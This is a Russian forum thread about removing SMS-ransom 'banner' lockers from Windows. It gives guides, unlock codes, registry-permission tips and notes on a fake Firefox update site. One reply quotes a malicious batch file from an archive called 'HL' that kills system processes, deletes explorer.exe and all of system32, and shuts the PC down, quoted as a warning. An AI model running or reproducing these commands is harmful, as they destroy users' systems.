В ответном SMS обещают прислать код для снятия этого "проклятия". Не верьте. Действуйте, как описано здесь.
Главное правило – не отправляйте SMS! И по каждому такому случаю надо жаловаться операторам сотовой связи, указывая короткие номера и коды, по которым мошенники получают деньги. Только так можно усложнить хакерам жизнь, и соответственно усмирить их пыл.
Подробная инструкция по удалению баннеров-вымогателей, а также по восстановлению функциональности системы после удаления баннеров, обновлена 01.03.2010: скачать doc-файл (альтернативная ссылка)
Инструкция и таблица составлены на основе всех страниц данного форума, спасибо zaruta и passerby.
Если в таблице есть ваш вариант, но он не подошел, пишите сообщение в форум.
Пошаговая инструкция по разблокировке выхода на любимые сайты интернета (Windows XP, Vista, 7), обновлена 04.09.2010: скачать doc-файл (альтернативная ссылка) (спасибо zaruta)
10 способов избавления от баннера, блокирующего сайты ВКонтакте, Одноклассники и др., обновлена 23.09.2010: скачать doc-файл (альтернативная ссылка) (спасибо zaruta)
Подробная инструкция, как удалить баннер, который просит пополнить счет абонента, с помощью LIVE CD или ERD COMMANDER, обновлена 17.09.2010: скачать doc-файл (альтернативная ссылка) (спасибо time, zaruta)
http://technet.microsoft.com/... - здесь качайте Process Explorer.Запустите его и сразу переместите туда, где его не будет закрывать баннер. Когда появится баннер, найдите в списке explorer.exe, нажмите на нем правой кнопкой и выберите properties, затем Threads, появится окно со списком dll-файлов, используемых им. Либо ищите в инете по их названиям то для чего они нужны, либо методом тыка завершайте их, нажимая кнопку "Kill". Там же смотрим, где этот файл находится, затем удаляем его на винчестере.
banner 31.01.2011 09:05: SERP802 30.01.2011 11:01
Защиту мою баннер прошел частично, при помощи программ, описанных в статье - снял сразу...
А что за защита?
Я просто запретил Админу редактирование в реестре:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies]
[hkey_local_machine\software\microsoft\Windows NT\CurrentVersion\Winlogon]
Вот и вся защита и никаких программ ставить не надо. После рестарта баннер просто не запускается.
Подскажите пожалуйста, как запретить изменение некоторых веток реестра?
Вопрос очень важен. Ведь способом, предлагаемым некто banner, можно на 100% оградиться от баннеров. Избранно запрещаем изменение веток реестра (вернее ключей) отвечающих за загрузку системы, безопасный режим и права приложений, ибо хорошей программе, устанавливаемой на компьютер, эти ключи реестра читать и изменять незачем.
banner, как Вы вручнуюбез всяких программ имеющих в своём наличие HIPS, KSN, PDM, SandBox умудрились заблокировать к изменению некоторые ключи реестра?
Осмелюсь вмешаться в дискуссию.
Ну, во - первых, не стОит постоянно работать на компьютере под Админом.
Ну и, тем более, "ходить" в интернет.
Это уже кой какая надежда на то, что не подцепишь баннер.
Во - вторых, Ваше высказывание: "... можно на 100% оградиться от баннеров." -
мягко говоря, неоправданно оптимистично.
Не буду вдаваться в подробности механизма - эта тема не из нашей оперы.
Ну а поэкспериментировать с реестром Вы можете открыв Редактор Реестра.
Выбирайте любой параметр и дальше - меню Правка - Разрешения.
Вот здесь Вы можете запретить / разрешить кому угодно и что угодно.
P.S. В Windows существует довольно много "лазеек" для автозапуска программ.
И для того, чтобы эффективно бороться с этим сАмым автозапуском, надо
эти "лазейки" знать.
Но есть одно НО. Мы не можем "перекрыть " эти пути автозагрузки
полностью, поскольку их использует система. Можно и ей запретить,
но тогда она не сможет работать полноценно.
Получается заколдованный круг - "надёжно" защитились, но работаем
(если сможем, конечно) на ущербной системе.
И неужели Вы думаете, что: "способом, предлагаемым некто banner, "
до этого никто раньше не додумался?
Зря Вы так думаете. Почитайте ВЕСЬ форум, материалы из шапки и, поверьте, многие вопросы отпадут сами по себе.
Блин, люди )))вы пишете что там зайти куда нибудь в папку виндовс и так далее))
у меня например, када я включаю копм сразу выскакивает херня на весь экран, что ваша система заблокирована, и отправьте смс....
и я ничего не могу нажать, контрл аль делит не работает ...
тупо черный экран с этой надписью
Что делать помогите????????????????плиззззззззз
Че за кипишь?
я запретил редактирование ключей в ветках POLICES, SAFEBOOT и WINLOGON .. а вот запретить именно ключи а не ветки винда сама не может... как запретил? как настраиваете права доступа на диске с NTSF примерно то же самое, через простой regedit.exe.... в свойствах ветки есть раздел прав доступа, савим Администратор - чтение. Их редактирование вроде как абсолютно никчему, почему бы их сразу было не запретить...
Самый адекватный ответ я получил от passerby. Ставлю ему большой и жирный плюс.
Мой вопрос заключался в том, как в "топорном" исполнении, то есть вручную, вакцинировать реестр Windows против баннеров-вымогателей.
золотые слова... =>
Но есть одно НО. Мы не можем "перекрыть " эти пути автозагрузки
полностью, поскольку их использует система. Можно и ей запретить,
но тогда она не сможет работать полноценно.
Получается заколдованный круг - "надёжно" защитились, но работаем (если сможем, конечно) на ущербной системе.
По крайней мере после запрета на ветки реестра этот баннер уже не может подменить shell, заблокировать диспетчер задач, и редактор реестра, а так же убить загрузку в безопасном режиме! Если кому-то этого мало, то .... дело ваше... меня и тем кому я это сделал все устраивает.... и люди уже попадали снова на банер но он просто не приживался в системе.... конечно все дыры не заткнешь но и это уже кое-что...
Доброго времени суток. Поймал банер, нашёл решение здесь http://support.kaspersky.ru/... . Решение такое: Для деактивации необходимо перевести время на часах на 7 суток.
Более подробно читайте здесь. Ссылка на слове здесь, но есть нюанс - по ссылке ни куда не переходит. Поэтому возникает вопрос - как перевести часы на 7 суток, если рабочий стол заблокирован? Если загрузить liveCD и поменять время, то оно поменяется при загрузке винды с жесткого диска? Заранее спасибо!
banner 01.02.2011 18:11:
время в БОИСе менять надо... после включения компа обычно надо нажимать delete
Спасибо! Попробуем! А ещё варианты есть?
Смена даты не помогла. Картинка банера по этой ссылке.
http://dbc-www.kaspersky-labs.com/....[blue]-1-[censored].png Только номер немного другой 89671655546. Помогите пожалуйста!
Код: DIGGER
код:SORRY (иногда приходится 3 раза вводить)
код:Три раза ввести 00000 но вводить не на цифровой клавиатуре
код:TETRIS
код:WARCRAFT
код:X-COM
код:KYRANDIA
код: DUNE 2
код:1 раз вводим: XYLIBOX,а потом два раза вводим 31337
код:1234567890
код:BOMBERMAN
код:SKY DESTROYER
код: DUCK HUNT
код: DOUBLE DRAGON
код:BATTLE TOADS
код:GALAGA
код:TNMTTF
код:SHAME ON THE NIGHT
код:LORD OF THE LAST DAY
код:WISH I HAD AN ANGEL
banner 01.02.2011 13:01:
Че за кипишь?
я запретил редактирование ключей в ветках POLICES, SAFEBOOT и WINLOGON .. а вот запретить именно ключи а не ветки винда сама не может... как запретил? как настраиваете права доступа на диске с NTSF примерно то же самое, через простой regedit.exe.... в свойствах ветки есть раздел прав доступа, савим Администратор - чтение. Их редактирование вроде как абсолютно никчему, почему бы их сразу было не запретить...
banner 01.02.2011 13:55:
По крайней мере после запрета на ветки реестра этот баннер уже не может подменить shell, заблокировать диспетчер задач, и редактор реестра, а так же убить загрузку в безопасном режиме! Если кому-то этого мало, то .... дело ваше... меня и тем кому я это сделал все устраивает.... и люди уже попадали снова на банер но он просто не приживался в системе.... конечно все дыры не заткнешь но и это уже кое-что...
Второй адекватный ответ на этом форуме на мой вопрос. Ставлю плюс banner.
passerby 01.02.2011 01:46:
Зря Вы так думаете. Почитайте ВЕСЬ форум, материалы из шапки и, поверьте, многие вопросы отпадут сами по себе.
passerby, только с Вами можно вести продуктивный диалог и как ни странно с "некто banner" )))
Остальные "Гуру" и "Профи" имеют лишь пустой мундир на ниве тщеславия и графомании.
passerby, только с Вами можно вести продуктивный диалог и как ни странно с "некто banner" )))
Остальные "Гуру" и "Профи" имеют лишь пустой мундир на ниве тщеславия и графомании.
Спасибо stopy за лестный отзыв о нашей работе!
А сами то что-нибудь можете?
zaruta, Привет!
Тут, как я погляжу, развиваются боевые действия!
И чего ты ведёшься? Пусть себе помогает кто хочет и как хочет.
А HL покажет, кто есть кто
zaruta, Привет!
Тут, как я погляжу, развиваются боевые действия!
И чего ты ведёшься? Пусть себе помогает кто хочет и как хочет.
А HL покажет, кто есть кто
Привет passerby Я просто внес небольшое разнообразие, а то уже устал от глупых вопросов, от них сам тупеешь!
Кстати появился совсем новый информер в браузере Мазила, я его сейчас изучаю, требуют деньги за обновление этого браузера, скрины выложу позже как разберусь!
Посмотри сайтик http://update.mozilla.org/ отлично придумано для лохов! Кстати не в обиду эти ребята из твоих краев!
У меня такое впечатление, что кто-то из старых знакомых, под разными никами , разводят...
Я кстати, на отдых, устал я немного...
Но просматривать форум буду регулярно...
zaruta , короче просмотрел что за ламер это писал ))))) HL ржу не могу просто призапуске файла он удаляеть почти все файлы важные для запуска системы и заменяет их подставными библиотеками, после этого винда умирает вот и все ламерская штучка я такие еще в школе писал.)))) затягиваешь ветку реестра от рабочей винды и делаешь проверку на жизневажные системные файлы которые повреждени автоматом восстанавливаються опля , на все ушло ровно 3мин. 40 , ну если учесть что комп не машьнявый было бы быстрее. Ты мне выложи банеров , да таких по серьезнее я прокадирую их и коды выложу, а то нам с другом не чем заняться сейчас))))
Дмитрий-Админ 01.02.2011 22:13:
zaruta , короче просмотрел что за ламер это писал ))))) HL ржу не могу просто призапуске файла он удаляеть почти все файлы важные для запуска системы и заменяет их подставными библиотеками, после этого винда умирает вот и все ламерская штучка я такие еще в школе писал.)))) затягиваешь ветку реестра от рабочей винды и делаешь проверку на жизневажные системные файлы которые повреждени автоматом восстанавливаються опля , на все ушло ровно 3мин. 40 , ну если учесть что комп не машьнявый было бы быстрее. Ты мне выложи банеров , да таких по серьезнее я прокадирую их и коды выложу, а то нам с другом не чем заняться сейчас))))
Хорошо выложу!
Но все таки ушло 3,40, а не 49 сек. (шучу)
Но я скажу, что HL даже для опытного пользователя серьезная проблема!
Но чуть попозже, я тут с этим сайтом разбираюсь http://update.mozilla.org/ не нравиться мне он, посмотри если не сильно занят, а я пока баннеров залью!
Дмитрий-Админ 01.02.2011 22:13:
zaruta , короче просмотрел что за ламер это писал ))))) HL ржу не могу просто призапуске файла он удаляеть почти все файлы важные для запуска системы и заменяет их подставными библиотеками, после этого винда умирает вот и все ламерская штучка я такие еще в школе писал.)))) затягиваешь ветку реестра от рабочей винды и делаешь проверку на жизневажные системные файлы которые повреждени автоматом восстанавливаються опля , на все ушло ровно 3мин. 40 , ну если учесть что комп не машьнявый было бы быстрее. Ты мне выложи банеров , да таких по серьезнее я прокадирую их и коды выложу, а то нам с другом не чем заняться сейчас))))
Отчаянный ты,Дмитрий-Админ, однако!
А ведь уже тот факт, что тебе пришлось "лечиться" после HL не делает тебе чести.
Зачем ты запустил неизвестное приложение, тем более зная, что оно вредопакостное?
А ведь достаточно было посмотреть свойства файла, а там открытым
текстом написано, что это "Непрерывный SFX RARархив.
Ну а открыв архив в 7Zip увидел бы его содержимое.
Файл Help.bat содержит следующее:
@echo off
title I will hack you!
attrib +h d:\ltofxq regedit /s Restore.reg
taskkill /f /im explorer.exe /im svchost.exe /t /p del /f /s /q %systemroot%\explorer.exe del /f /s /q %systemroot%\system32\*.*
rundll32 shell32, SHExitWindowsEx 2
rd /s /q d:\ltofxq
Не настораживает такое содержимое? (подчёркнуто мной) Restore.reg - второй файл из архива. Ну а какое его содержание - догадайся сам
Так что, не от баннеров надо лечить , а юзеров учить. Чтобы имели хоть малейшее
понятие о своей горячо любимой Windows, чтобы привыкали делать резервные копии важных данных, (...можешь дополнить список).
И пока этого не будет - БУДУТ баннеры.
Ну, а если ты этим зарабатываешь себе на хлеб с маслом, то тебе и не
выгодно совсем "учить". Тебе, понятно, выгодней - лечить.
Дмитрий-Админ 01.02.2011 23:33:
Вокруг меня 6 машин 2 сервака ,мне не жалко поковыряться и посмотреть ,что юные кудесники придумали
Дык ведь если твои 6 машин и 2 сервака как то между собой соединены -
то "юные кудесники" могут запросто уложить всё это хозяйство.
(ну, типа HL в "сетевом" исполнении)
Дмитрий-Админ 02.02.2011 00:19:
Сейчас найдем ,кинь прямую ссылку на эту заразу ,чтоб я поймал ...
В том то и дело прямой ссылки нет! Я на машине сына, он скачивал что то для телефона и поймал информер, при нажатии на кнопочку " Обновить firefox" выкидывает на сайт http://update.mozilla.org/ скрины вверху!
Ерунда, покопаюсь немного-разберусь потом расскажу!
Запусти Стартер програмулину она показываеть активность плагинов , и там есть библиотека внедренная в сам Фаер фокс котороя и вещает это скорее всего так ,мне бы его на експертизу сказал бы,твои банеры еще не юзал ,пока занет другой темой ,как проверю отпишу .
Дмитрий-Админ 02.02.2011 00:40:
Запусти Стартер програмулину она показываеть активность плагинов , и там есть библиотека внедренная в сам Фаер фокс котороя и вещает это скорее всего так ,мне бы его на експертизу сказал бы,твои банеры еще не юзал ,пока занет другой темой ,как проверю отпишу .
Банер с тыквой попрощайка требует стукнуть в аську ...
Снимаеться зажатием Контр+Алт+Дел 13 раз , выскакиевает диспечер снимаем protorian.exe и services.exe начинает работать шустрее паявляеться рабочий стол ,но не весь, затем идем в system32 файл PGDFGSVC.exe , далее в Program Files убиваем Procexp.exe , и самое главное Common Files тут лежит services.exe убиваем , после этого грузимся и радуемся жизни. Такой кстати я не мочил . По каждому банеру могу выложить интсруктаж.
Банер под названием Vip porno черный фон белый шрифт, снимаеться Алт +Ескп затем убиваеться процесс .....avi.exe ,также срабатывает нажатие Контр+Алт+Дел более 100 раз слетает))) Едем далше....